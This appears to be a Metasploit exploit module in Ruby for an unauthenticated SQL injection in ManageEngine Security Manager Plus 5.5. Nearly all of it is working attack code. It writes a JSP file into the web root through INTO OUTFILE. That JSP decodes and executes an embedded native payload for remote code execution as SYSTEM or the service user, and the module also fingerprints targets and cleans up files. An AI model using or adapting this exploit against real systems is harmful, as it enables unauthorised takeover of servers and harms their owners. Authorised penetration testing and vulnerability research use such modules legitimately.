246 lines
7.1 KiB
Ruby
246 lines
7.1 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'msf/core/exploit/file_dropper'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::FileDropper
|
|
include Msf::Exploit::EXE
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
|
|
'Description' => %q{
|
|
This module exploits a SQL injection found in ManageEngine Security Manager Plus
|
|
advanced search page, which results in remote code execution under the context of
|
|
SYSTEM in Windows; or as the user in Linux. Authentication is not required in order
|
|
to exploit this vulnerability.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'xistence <xistence[at]0x90.nl>', # Discovery & Metasploit module
|
|
'sinn3r', # Improved Metasploit module
|
|
'egypt' # Improved Metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
['OSVDB', '86562'],
|
|
['EDB','22094'],
|
|
['BID', '56138']
|
|
],
|
|
'Platform' => ['win', 'linux'],
|
|
'Targets' =>
|
|
[
|
|
['Automatic', {}],
|
|
['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }],
|
|
['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'Privileged' => false,
|
|
'DisclosureDate' => "Oct 18 2012"))
|
|
|
|
register_options(
|
|
[
|
|
OptPort.new('RPORT', [true, 'The target port', 6262])
|
|
], self.class)
|
|
end
|
|
|
|
|
|
def check
|
|
res = sqli_exec(Rex::Text.rand_text_alpha(1))
|
|
|
|
if res and res.body =~ /Error during search/
|
|
return Exploit::CheckCode::Appears
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
|
|
def pick_target
|
|
return target if target.name != 'Automatic'
|
|
|
|
rnd_num = Rex::Text.rand_text_numeric(1)
|
|
rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
|
|
clean_path= "../webapps/SecurityManager/#{rnd_fname}"
|
|
outpath = "../" + clean_path
|
|
|
|
register_file_for_cleanup(clean_path)
|
|
|
|
sqli = "#{rnd_num})) union select @@version,"
|
|
sqli << (2..28).map {|e| e} * ","
|
|
sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
|
|
sqli_exec(sqli)
|
|
|
|
res = send_request_raw({'uri'=>"/#{rnd_fname}"})
|
|
|
|
# What @@version returns:
|
|
# Linux = 5.0.36-enterprise
|
|
# Windows = 5.0.36-enterprise-nt
|
|
|
|
if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/
|
|
print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}")
|
|
return targets[1] # Windows target
|
|
elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/
|
|
print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}")
|
|
return targets[2]
|
|
end
|
|
|
|
return nil
|
|
end
|
|
|
|
#
|
|
# Embeds our executable in JSP
|
|
#
|
|
def generate_jsp_payload
|
|
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
|
|
native_payload = Rex::Text.encode_base64(generate_payload_exe(opts))
|
|
native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3)
|
|
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
|
|
|
|
var_raw = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
|
|
if @my_target['Platform'] == 'linux'
|
|
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
chmod = %Q|
|
|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
|
|
Thread.sleep(200);
|
|
|
|
|
|
|
var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
cleanup = %Q|
|
|
Thread.sleep(200);
|
|
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
|
|
|
|
else
|
|
chmod = ''
|
|
cleanup = ''
|
|
end
|
|
|
|
jsp = %Q|
|
|
<%@page import="java.io.*"%>
|
|
<%@page import="sun.misc.BASE64Decoder"%>
|
|
|
|
<%
|
|
byte[] #{var_raw} = null;
|
|
BufferedOutputStream #{var_ostream} = null;
|
|
try {
|
|
String #{var_buf} = "#{native_payload}";
|
|
|
|
BASE64Decoder #{var_decoder} = new BASE64Decoder();
|
|
#{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
|
|
|
|
File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
|
|
String #{var_path} = #{var_tmp}.getAbsolutePath();
|
|
|
|
#{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
|
|
#{var_ostream}.write(#{var_raw});
|
|
#{var_ostream}.close();
|
|
#{chmod}
|
|
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
|
|
#{cleanup}
|
|
} catch (Exception e) {
|
|
}
|
|
%>
|
|
|
|
|
|
|
jsp = jsp.gsub(/\n/, '')
|
|
jsp = jsp.gsub(/\t/, '')
|
|
|
|
jsp.unpack("H*")[0]
|
|
end
|
|
|
|
def sqli_exec(sqli_string)
|
|
cookie = 'STATE_COOKIE=&'
|
|
cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
|
|
cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
|
|
cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
|
|
cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
|
|
cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
|
|
cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
|
|
cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
|
|
cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
|
|
cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'
|
|
|
|
state_id = Rex::Text.rand_text_numeric(5)
|
|
|
|
send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
|
|
'headers' => {
|
|
'Cookie' => cookie,
|
|
'Accept-Encoding' => 'identity'
|
|
},
|
|
'vars_get' => {
|
|
'reqType' =>'AdvanceSearch',
|
|
'SUBREQUEST' =>'XMLHTTP'
|
|
},
|
|
'vars_post' => {
|
|
'ANDOR' => 'and',
|
|
'condition_1' => 'OpenPorts@PORT',
|
|
'operator_1' => 'IN',
|
|
'value_1' => sqli_string,
|
|
'COUNT' => '1'
|
|
}
|
|
})
|
|
|
|
end
|
|
|
|
#
|
|
# Run the actual exploit
|
|
#
|
|
def inject_exec(out)
|
|
hex_jsp = generate_jsp_payload
|
|
rnd_num = Rex::Text.rand_text_numeric(1)
|
|
sqli = "#{rnd_num})) union select 0x#{hex_jsp},"
|
|
sqli << (2..28).map {|e| e} * ","
|
|
sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
|
|
|
|
print_status("#{rhost}:#{rport} - Trying SQL injection...")
|
|
sqli_exec(sqli)
|
|
|
|
fname = "/#{File.basename(out)}"
|
|
print_status("#{rhost}:#{rport} - Requesting #{fname}")
|
|
send_request_raw({'uri' => fname})
|
|
|
|
handler
|
|
end
|
|
|
|
|
|
def exploit
|
|
@my_target = pick_target
|
|
if @my_target.nil?
|
|
print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
|
|
return
|
|
end
|
|
|
|
jsp_name = rand_text_alpha(rand(6)+3)
|
|
# The working directory when our payload runs is
|
|
# c:/AdventNet/SecurityManager/bin/
|
|
# while the jsp file will be in
|
|
# c:/AdventNet/SecurityManager/webapps/SecurityManager/
|
|
# so we need to adjust the traversal level.
|
|
clean_path= "../webapps/SecurityManager/#{jsp_name + '.jsp'}"
|
|
outpath = "../" + clean_path
|
|
|
|
register_file_for_cleanup(clean_path)
|
|
|
|
inject_exec(outpath)
|
|
end
|
|
end
|